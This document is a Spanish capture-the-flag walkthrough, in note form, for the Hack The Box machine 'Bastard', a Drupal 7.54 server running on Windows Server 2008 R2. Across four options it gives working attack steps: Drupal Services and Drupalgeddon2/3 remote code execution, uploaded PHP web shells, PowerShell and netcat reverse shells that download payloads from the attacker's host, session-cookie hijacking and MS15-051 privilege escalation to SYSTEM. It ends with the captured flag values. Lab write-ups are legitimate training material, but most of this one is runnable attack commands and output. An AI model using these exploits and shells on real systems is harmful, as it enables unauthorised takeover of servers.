	[*] Moving : ./sites/default/files/.htaccess
	[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
	[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
	[!] FAILED : Couldn't find a writeable web path
	--------------------------------------------------------------------------------
	[*] Dropping back to direct OS commands

	drupalgeddon2>> uname -a
	drupalgeddon2>> lsb_release -a
	No muestra información.


----- msrpc: Por el puerto 135 y 49154 Version Microsoft Windows RPC ---------------------------

-- Aplicacion script de NMAP:
	
	nmap -n -sV -p135,49154 --script=*msrpc* 10.10.10.9
	Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-14 04:16 EDT
	Nmap scan report for 10.10.10.9
	Host is up (0.039s latency).

	PORT      STATE SERVICE VERSION
	135/tcp   open  msrpc   Microsoft Windows RPC
	49154/tcp open  msrpc   Microsoft Windows RPC
	Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

-- Aplicación Metasploit:

	msf5 > search msrpc

	Matching Modules
	================

   #  Name                                  Disclosure Date  Rank  Check  Description
   -  ----                                  ---------------  ----  -----  -----------
   0  exploit/windows/dcerpc/ms05_017_msmq  2005-04-12       good  No     MS05-017 Microsoft Message Queueing Service Path Overflow
	
	No funciona.




+++++++++ FASE DE EXPLOTACION ++++++++++++++++++++++++++++++++++++++++++++++++++++++++

//////////////////////////// OPCION 1 ////////////////////////////////////////////

	Con la aplicación droopescan, confirmar que tiene drupal 7.54.
	Con la aplicación searchsploit drupal 7,  nos pmuestra varias. 
	Utilizar php/webapps/41564.php --> este falla. 
	Dentro del exploit viene una web y copio el exploit que viene. Le llamo Drupal.php
	Modificar los siguientes parametros:
		$url = 'http://vmweb.lan/drupal-7.54';   --> $url = 'http://10.10.10.9';
		$endpoint_path = '/rest_endpoint';		--> $endpoint_path = '/rest'; // Este si lo pongo en la web http://10.10.10.9/res_endpoint (falla). Con la aplicacion dirsearch, confirmo que es la direccion http://10.10.10.9/rest
		$endpoint = 'rest_endpoint';  			--> Dejar como esta.
		
		$file = [
		'filename' => 'dixuSOspsOUU.php',        --> 'filename' => 'shell.php', // nombre que se va a crear en la maquina Bastard.
		'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'  -->  'data' => '<?php system($_GET["c"]); ?>'
	Para que funcione este exploit instalar el paquete php-curl .
		apt install php-curl -y 
	
	Ejecutar el exploit:  php drupal.php
		Este esploit nos crea 2 ficheros session.json y user.json
		Editamos los dos ficheros json. 
		En el session.json nos muestra el id de la session, se supone que es de admin.
		En el user.json, nos muestra el nombre admin y el hash (password)
		
	Comprobar que la shell.php, se ha subido http://10.10.10.9/shell.php -- Nos muestra pantalla blanca.
	probamos un comando 
	http://10.10.10.9/shell.php?c=hostname , nos contesta  --> Bastard.
	http://10.10.10.9/shell.php?c=whoami  , nos contesta --> nt authority\iusr 
	http://10.10.10.9/shell.php?c=systeminfo   , nos contesta:
	
	Host Name:                 BASTARD
	OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
	OS Version:                6.1.7600 N/A Build 7600
	OS Manufacturer:           Microsoft Corporation
	OS Configuration:          Standalone Server
	OS Build Type:             Multiprocessor Free
	Registered Owner:          Windows User
	Registered Organization:   
	Product ID:                00496-001-0001283-84782
	Original Install Date:     18/3/2017, 7:04:46 ££
	System Boot Time:          16/5/2020, 10:06:32 §£
	System Manufacturer:       VMware, Inc.
	System Model:              VMware Virtual Platform
	System Type:               x64-based PC
	Processor(s):              2 Processor(s) Installed.
							   [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
							   [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
	BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
	Windows Directory:         C:\Windows
	System Directory:          C:\Windows\system32
	Boot Device:               \Device\HarddiskVolume1
	System Locale:             el;Greek
	Input Locale:              en-us;English (United States)
	Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
	Total Physical Memory:     2.047 MB
	Available Physical Memory: 1.527 MB
	Virtual Memory: Max Size:  4.095 MB
	Virtual Memory: Available: 3.553 MB
	Virtual Memory: In Use:    542 MB
	Page File Location(s):     C:\pagefile.sys
	Domain:                    HTB
	Logon Server:              N/A
	Hotfix(s):                 N/A
	Network Card(s):           1 NIC(s) Installed.
							   [01]: Intel(R) PRO/1000 MT Network Connection
									 Connection Name: Local Area Connection
									 DHCP Enabled:    No
									 IP address(es)
									 [01]: 10.10.10.9	
		
	*(como curiosidad para ver que se el panel)
	Podemos conprobar la session, para ello accedemos a la web http://10.10.10.9/admin , nos da el error de permiso denegado.
	Intentamos con una cookie poder acceder.
	Copiamos el texto de "Session_name" del fichero session.json (SESSd873f26fc11f2b7e6e4aa0f6fce59913)
	En la web, que nos daba permiso denegado, pulsar boton derecho del raton y pulsar "inspeccionar elemento".
	En la ventana inferior escribir:
		document.cookie = "SESSd873f26fc11f2b7e6e4aa0f6fce59913=4zALn5Xv3KaH05mNnevZiN1pKnc0bTJ4-EK9KjH25FI;token=i7s1SKNh-_47MDtDxd_Uw4jYfJ2vB5g5HAjqfXEWjv0"
	Actualizamos la web con F5 y nos muestra un menu. 
	*En firefox si no deja escribir. en el navegador escribir about:config --> Buscar devtools.selfxss.count --> cambiar el valor a 10000.
	

	Utilizar el exploit de nishang.
	Fuente: https://github.com/samratashok/nishang
	Descargar: wget  https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
	Editamos el exploit y añadimos en la ultima linea, Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 4444

	En una consola habilitar un servidor python:
	python3 -m http.server 80
	
	En una consola ejecuto para consegir en enlace:
	nc -lvnp 4444

	En el navegador añadimos la siguiente parte del exploit de nishang.
	10.10.10.9/shell.php?c=powershell -nop -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3/Invoke-PowerShellTcp.ps1')
	
	Se consigue una consola de powershell, como usuario.
	PS C:\inetpub\drupal-7.54>whoami
	nt authority\iusr

-- ELEVACION DE PRIVILEGIOS.
	Utilizar el exploit sherlock.ps1, para que nos muestre vulnerabilidades.
	Fuente: https://github.com/rasta-mouse/Sherlock
	Descargamos: wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1
	modificamos el fichero y al final del todo añadimos:     Find-AllVulns
	Como esta habilitado en smb lo enviamos por aqui.
	En una consola habilitamos en servidor smb.
	# smbserver.py a . 
	
	En la consola de powershell lo transferimos.
	PS C:\inetpub\drupal-7.54> cp \\10.10.14.3\a\Sherlock.ps1
	
	Importamos el modulo:    Import-Module .\sherlock.ps1
	
	PS C:\inetpub\drupal-7.54>  Import-Module .\sherlock.ps1

	Title      : User Mode to Ring (KiTrap0D)
	MSBulletin : MS10-015
	CVEID      : 2010-0232
	Link       : https://www.exploit-db.com/exploits/11199/
	VulnStatus : Not supported on 64-bit systems

	Title      : Task Scheduler .XML
	MSBulletin : MS10-092
	CVEID      : 2010-3338, 2010-3888
	Link       : https://www.exploit-db.com/exploits/19930/
	VulnStatus : Appears Vulnerable

	Title      : NTUserMessageCall Win32k Kernel Pool Overflow
	MSBulletin : MS13-053
	CVEID      : 2013-1300
	Link       : https://www.exploit-db.com/exploits/33213/
	VulnStatus : Not supported on 64-bit systems

	Title      : TrackPopupMenuEx Win32k NULL Page
	MSBulletin : MS13-081
	CVEID      : 2013-3881
	Link       : https://www.exploit-db.com/exploits/31576/
	VulnStatus : Not supported on 64-bit systems

	Title      : TrackPopupMenu Win32k Null Pointer Dereference
	MSBulletin : MS14-058
	CVEID      : 2014-4113
	Link       : https://www.exploit-db.com/exploits/35101/
	VulnStatus : Not Vulnerable

	Title      : ClientCopyImage Win32k
	MSBulletin : MS15-051
	CVEID      : 2015-1701, 2015-2433
	Link       : https://www.exploit-db.com/exploits/37367/
	VulnStatus : Appears Vulnerable

	Title      : Font Driver Buffer Overflow
	MSBulletin : MS15-078
	CVEID      : 2015-2426, 2015-2433
	Link       : https://www.exploit-db.com/exploits/38222/
	VulnStatus : Not Vulnerable

	Title      : 'mrxdav.sys' WebDAV
	MSBulletin : MS16-016
	CVEID      : 2016-0051
	Link       : https://www.exploit-db.com/exploits/40085/
	VulnStatus : Not supported on 64-bit systems

	Title      : Secondary Logon Handle
	MSBulletin : MS16-032
	CVEID      : 2016-0099
	Link       : https://www.exploit-db.com/exploits/39719/
	VulnStatus : Appears Vulnerable

	Title      : Windows Kernel-Mode Drivers EoP
	MSBulletin : MS16-034
	CVEID      : 2016-0093/94/95/96
	Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
				 6-034?
	VulnStatus : Not Vulnerable

	Title      : Win32k Elevation of Privilege
	MSBulletin : MS16-135
	CVEID      : 2016-7255
	Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
				 ample-Exploits/MS16-135
	VulnStatus : Not Vulnerable

	Title      : Nessus Agent 6.6.2 - 6.10.3
	MSBulletin : N/A
	CVEID      : 2017-7199
	Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
				 tml
	VulnStatus : Not Vulnerable

	
	Ejecutar la vulnerabilidad MS15-051.
	Buscar en google MS15-051.
	Fuente: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
	wget https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
	Descomprimir: 7z e MS15-051-KB3045171.zip
	Utilizar en ms15-051x64.exe
	Lo ejecutamos sin subir, desde la consola de powershell.	\\10.10.14.3\a\ms15-051x64.exe whoami

	PS C:\inetpub\drupal-7.54> \\10.10.14.3\a\ms15-051x64.exe whoami
	[#] ms15-051 fixed by zcgonvh
	[!] process with pid: 2136 created.
	==============================
	nt authority\system

	Para conseguir una shell de 64 bits utilizar el exploit nc64.exe
	Fuente: https://github.com/phackt/pentest/tree/master/privesc/windows
	Descargar wget https://github.com/phackt/pentest/tree/master/privesc/windows/nc64.exe
	Subir a la maquina Bastard.   cp \\10.10.14.3\a\nc64.exe
	Y lo ejecutamos las dos cosas:
	
	En otra consola ejecutaremos la nueva conesión por 64.
	nc -lvnp 55555
	
	PS C:\inetpub\drupal-7.54> \\10.10.14.3\a\ms15-051x64.exe "nc64.exe -e cmd.exe 10.10.14.3 55555"
	
	Se consigue una consola de Administrador.
	C:\inetpub\drupal-7.54>whoami
	whoami
	nt authority\system
	


+++ otra forma que se puede conseguir ser administrador es:
	Es desde drupal 7.5
	root@kali:~/Desktop# searchsploit drupal 7.5
		Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)       | php/webapps/44557.rb
		Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)    | php/webapps/44542.txt
	
	Buscar en google "Drupalgeddon3 python"
	Encuentra este exploit de https://github.com/oways/SA-CORE-2018-004/blob/master/drupalgeddon3.py
	Descargar wget https://raw.githubusercontent.com/oways/SA-CORE-2018-004/master/drupalgeddon3.py
	Desde la web http://10.10.10.9/admin  --> pulsar en "Find content"
	Pulsar en el nodo REST. Copiar dirección.
	Ejecutar el exploit, con la session_name, session_id del fichero anterior session.json
	python drupalgeddon3.py http://10.10.10.9/ "SESSd873f26fc11f2b7e6e4aa0f6fce59913=Z3iGYGxxQpyFTfGUpVSdSgbGCYs5rX7C8KhDh1bIzag" 1 "whoami"

	Nos contesta correctarmente: nt authority\iusr

	
//////////////////////////// OPCION 2 ////////////////////////////////////////////

	Con el analisis de searchsploit de Drupal 7.5. Ejecutar "Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php"
	Exploit 41564.php lo copio y lo renombro a drupal_exploit.php
	Editar y modificar.
	$url = 'http://10.10.10.9';
	$endpoint_path = '/rest';
	$endpoint = 'rest_endpoint';

	$file = [
		'filename' => 'shell.php',
		'data' => '<?php system($_REQUEST["cmd"]); ?>'
	
	apt-get install php-curl
	Ejecutar el exploit: php drupal_exploit.php
	Stored session information in session.json
	Stored user information in user.json
	Cache contains 7 entries
	File written: http://10.10.10.9/shell.php
	(Nos crea 2 ficheros, session.json y user.json)
	Comprobar escribiendo en el navegador http://10.10.10.9/shell.php nos muestra pantalla blanca, nos lo ha subido.
	Probar que la shell funciona, con http://10.10.10.9/shell.php?cmd=whoami   , Nos contesta nt authority\iusr 
	Probar privilegios con http://10.10.10.9/shell.php?cmd=whoami%20/priv, Nos contesta.
	
	PRIVILEGES INFORMATION
	----------------------

	Privilege Name          Description                               State  
	======================= ========================================= =======
	SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
	SeImpersonatePrivilege  Impersonate a client after authentication Enabled
	SeCreateGlobalPrivilege Create global objects                     Enabled
	
	Con los 2 ficheros obtenidos .json.

	Utilizar el exploit de nishang.
	Fuente: https://github.com/samratashok/nishang
	Descargar: wget  https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
	Editamos el exploit y añadimos en la ultima linea, Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 443

	En una consola habilitar un servidor python:
	python3 -m http.server 4444
	
	En una consola ejecuto para consegir en enlace:
	nc -lvnp 443

	En el navegador añadimos la siguiente parte del exploit de nishang.
	10.10.10.9/shell.php?cmd=C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:4444/Invoke-PowerShellTcp.ps1')
	
	Se consigue una consola de powershell, como usuario.
	PS C:\inetpub\drupal-7.54>whoami
	nt authority\iusr
	PS C:\inetpub\drupal-7.54> 
	
-- ELEVACION DE PRIVILEGIOS.
	
	Ejecutar el comando systeminfo.
	PS C:\inetpub\drupal-7.54> systeminfo   
	
	Host Name:                 BASTARD
	OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
	OS Version:                6.1.7600 N/A Build 7600
	OS Manufacturer:           Microsoft Corporation
	OS Configuration:          Standalone Server
	OS Build Type:             Multiprocessor Free
	Registered Owner:          Windows User
	Registered Organization:   
	Product ID:                00496-001-0001283-84782
	Original Install Date:     18/3/2017, 7:04:46 ££
	System Boot Time:          16/5/2020, 10:06:32 §£
	System Manufacturer:       VMware, Inc.
	System Model:              VMware Virtual Platform
	System Type:               x64-based PC
	Processor(s):              2 Processor(s) Installed.
							   [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
							   [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
	BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
	Windows Directory:         C:\Windows
	System Directory:          C:\Windows\system32
	Boot Device:               \Device\HarddiskVolume1
	System Locale:             el;Greek
	Input Locale:              en-us;English (United States)
	Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
	Total Physical Memory:     2.047 MB
	Available Physical Memory: 1.527 MB
	Virtual Memory: Max Size:  4.095 MB
	Virtual Memory: Available: 3.553 MB
	Virtual Memory: In Use:    542 MB
	Page File Location(s):     C:\pagefile.sys
	Domain:                    HTB
	Logon Server:              N/A
	Hotfix(s):                 N/A
	Network Card(s):           1 NIC(s) Installed.
							   [01]: Intel(R) PRO/1000 MT Network Connection
									 Connection Name: Local Area Connection
									 DHCP Enabled:    No
									 IP address(es)
									 [01]: 10.10.10.9	

	Utilizar el exploit sherlock.ps1, para que nos muestre vulnerabilidades.
	Fuente: https://github.com/rasta-mouse/Sherlock
	Descargamos: wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1
	modificamos el fichero y al final del todo añadimos:     Find-AllVulns
	
	Habilitar una consola un servidor python.
	python -m SimpleHTTPServer
	
	En la consola powershell, que tenemos ejecutar:
		
	PS C:\inetpub\drupal-7.54> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8000/Sherlock.ps1')


	Title      : User Mode to Ring (KiTrap0D)
	MSBulletin : MS10-015
	CVEID      : 2010-0232
	Link       : https://www.exploit-db.com/exploits/11199/
	VulnStatus : Not supported on 64-bit systems

	Title      : Task Scheduler .XML
	MSBulletin : MS10-092
	CVEID      : 2010-3338, 2010-3888
	Link       : https://www.exploit-db.com/exploits/19930/
	VulnStatus : Appears Vulnerable

	Title      : NTUserMessageCall Win32k Kernel Pool Overflow
	MSBulletin : MS13-053
	CVEID      : 2013-1300
	Link       : https://www.exploit-db.com/exploits/33213/
	VulnStatus : Not supported on 64-bit systems

	Title      : TrackPopupMenuEx Win32k NULL Page
	MSBulletin : MS13-081
	CVEID      : 2013-3881
	Link       : https://www.exploit-db.com/exploits/31576/
	VulnStatus : Not supported on 64-bit systems

	Title      : TrackPopupMenu Win32k Null Pointer Dereference
	MSBulletin : MS14-058
	CVEID      : 2014-4113
	Link       : https://www.exploit-db.com/exploits/35101/
	VulnStatus : Not Vulnerable

	Title      : ClientCopyImage Win32k
	MSBulletin : MS15-051
	CVEID      : 2015-1701, 2015-2433
	Link       : https://www.exploit-db.com/exploits/37367/
	VulnStatus : Appears Vulnerable

	Title      : Font Driver Buffer Overflow
	MSBulletin : MS15-078
	CVEID      : 2015-2426, 2015-2433
	Link       : https://www.exploit-db.com/exploits/38222/
	VulnStatus : Not Vulnerable

	Title      : 'mrxdav.sys' WebDAV
	MSBulletin : MS16-016
	CVEID      : 2016-0051
	Link       : https://www.exploit-db.com/exploits/40085/
	VulnStatus : Not supported on 64-bit systems

	Title      : Secondary Logon Handle
	MSBulletin : MS16-032
	CVEID      : 2016-0099
	Link       : https://www.exploit-db.com/exploits/39719/
	VulnStatus : Appears Vulnerable

	Title      : Windows Kernel-Mode Drivers EoP
	MSBulletin : MS16-034
	CVEID      : 2016-0093/94/95/96
	Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
				 6-034?
	VulnStatus : Not Vulnerable

	Title      : Win32k Elevation of Privilege
	MSBulletin : MS16-135
	CVEID      : 2016-7255
	Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
				 ample-Exploits/MS16-135
	VulnStatus : Not Vulnerable

	Title      : Nessus Agent 6.6.2 - 6.10.3
	MSBulletin : N/A
	CVEID      : 2017-7199
	Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
				 tml
	VulnStatus : Not Vulnerable

	De todos probar MS15-051. Buscar en google ms15-051 exploit. Encontrar este:
	https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051 , descargar el MS15-051-KB3045171.zip
	wget https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
	
	Descomprimir: unzip 
	Copiar el fichero  ms15-051x64.exe al directorio de trabajo.
	copiar /usr/share/windows-resources/binaries/nc.exe  al directorio de trabajo.
	
	Creo un servidor por samba:
	smbserver-py smbfolder $(pwd) 
	
	Otra consola poner a la escucha:
	nc -nlvp 443
	
	Otra consola volvemos a realizar con el exploit de drupaldeddon3.py 
	python drupalgeddon3.py http://10.10.10.9 "SESSd873f26fc11f2b7e6e4aa0f6fce59913=4zALn5Xv3KaH05mNnevZiN1pKnc0bTJ4-EK9KjH25FI" 1 '\\10.10.14.10\smbfolder\ms15-051x64.exe "\\10.10.14.10\smbfolder\nc.exe -e cmd 10.10.14.10 443"'
	*Si falla pasar nc64.exe a nuestro directorio de trabajo y modificar en el ejecutable anterior.
	
	Se consigue una shell de administrador:
	C:\inetpub\drupal-7.54>whoami
	whoami
	nt authority\system


//////////////////////////// OPCION 3 ////////////////////////////////////////////

	Otra forma para llegar a una consola de usuario es mediante Drupalgeddon2. Que nos aparece al ejecutar la aplicacion "searchsploit drupal 7. "
	Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
	lo copiamos a nuestro directorio de trabajo y modificar el nombre
	mv 44449.rb drupalgeddon2.rb

	ruby drupalgeddon2.rb http://10.10.10.9
	ruby: warning: shebang line ending with \r may cause problems
	[*] --==[::#Drupalggedon2::]==--
	--------------------------------------------------------------------------------
	[i] Target : http://10.10.10.9/
	--------------------------------------------------------------------------------
	[+] Found  : http://10.10.10.9/CHANGELOG.txt    (HTTP Response: 200)
	[+] Drupal!: v7.54
	--------------------------------------------------------------------------------
	[*] Testing: Form   (user/password)
	[+] Result : Form valid
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Clean URLs
	[+] Result : Clean URLs enabled
	--------------------------------------------------------------------------------
	[*] Testing: Code Execution   (Method: name)
	[i] Payload: echo JUARHKOJ
	[+] Result : JUARHKOJ
	[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
	--------------------------------------------------------------------------------
	[*] Testing: Existing file   (http://10.10.10.9/shell.php)
	[!] Response: HTTP 200 // Size: 6.   ***Something could already be there?***
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Writing To Web Root   (./)
	[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
	[!] Target is NOT exploitable [2-2] (HTTP Response: 200)...   Got an empty response back
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Existing file   (http://10.10.10.9/sites/default/shell.php)
	[i] Response: HTTP 404 // Size: 12
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Writing To Web Root   (sites/default/)
	[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
	[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Existing file   (http://10.10.10.9/sites/default/files/shell.php)
	[i] Response: HTTP 404 // Size: 12
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Writing To Web Root   (sites/default/files/)
	[*] Moving : ./sites/default/files/.htaccess
	[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
	[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
	[!] FAILED : Couldn't find a writeable web path                                                                                     
	--------------------------------------------------------------------------------                                                    
	[*] Dropping back to direct OS commands  

	Nos sale una consola.
	drupalgeddon2>> whoami                                                                                                              
	nt authority\iusr  

//////////////////////////// OPCION 4 ////////////////////////////////////////////

	Con el analisis de searchsploit de Drupal 7.5. Ejecutar "Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php"
	Exploit 41564.php lo copio y lo renombro a drupal_exploit.php
	Editar y modificar.
	$url = 'http://10.10.10.9';
	$endpoint_path = '/rest';
	$endpoint = 'rest_endpoint';

	$file = [
		'filename' => 'shell.php',
		'data' => '<?php system($_REQUEST["cmd"]); ?>'
	
	apt-get install php-curl
	Ejecutar el exploit: php drupal_exploit.php
	Stored session information in session.json
	Stored user information in user.json
	Cache contains 7 entries
	File written: http://10.10.10.9/shell.php
	(Nos crea 2 ficheros, session.json y user.json)
	Comprobar escribiendo en el navegador http://10.10.10.9/shell.php nos muestra pantalla blanca, nos lo ha subido.
	Probar que la shell funciona, con http://10.10.10.9/shell.php?cmd=whoami   
	
	Copiar nc64.exe en el directorio de trabajo.

	Ejecutar en servicio de servidor python:
	python -m SimpleHTTPServer 80
	
	En el navegador escribir:
	http://10.10.10.9/shell.php?c=certutil -urlcache -f http://10.10.14.10/nc64.exe nc64.exe
	
	http://10.10.10.9/shell.php?c=dir 
	Confirmo que ha subido el fichero nc64.exe
	
	Abrimos una consola para enlace:
	nc -lvp 441
	
	En el navegador escribir:
	http://10.10.10.9/shell.php?c=nc64.exe 10.10.14.10 441 -e cmd
	
	Se consigue una shell como usuario:
	C:\inetpub\drupal-7.54>whoami
	whoami
	nt authority\iusr

-- ELEVACION DE PRIVILEGIOS.
	
	Buscar en google "6.1.7600 kernel exploit binary"
	Fuente: https://github.com/SecWiki/windows-kernel-exploits
		
	Utiliza ms15-051
	


		
+++++ FASE DE POSTEXPLOTACION ++++++++++++++++++++++++++++++++++++

	FLAG USUARIO:
	PS C:\Users\dimitris\Desktop> cat user.txt
	ba22fde1932d06eb76a163d312f921a2




	FLAG ROOT:
	C:\Users\Administrator\Desktop>more root.txt.txt
	more root.txt.txt
	4bf12b963da1b30cc93496f617f7ba7c



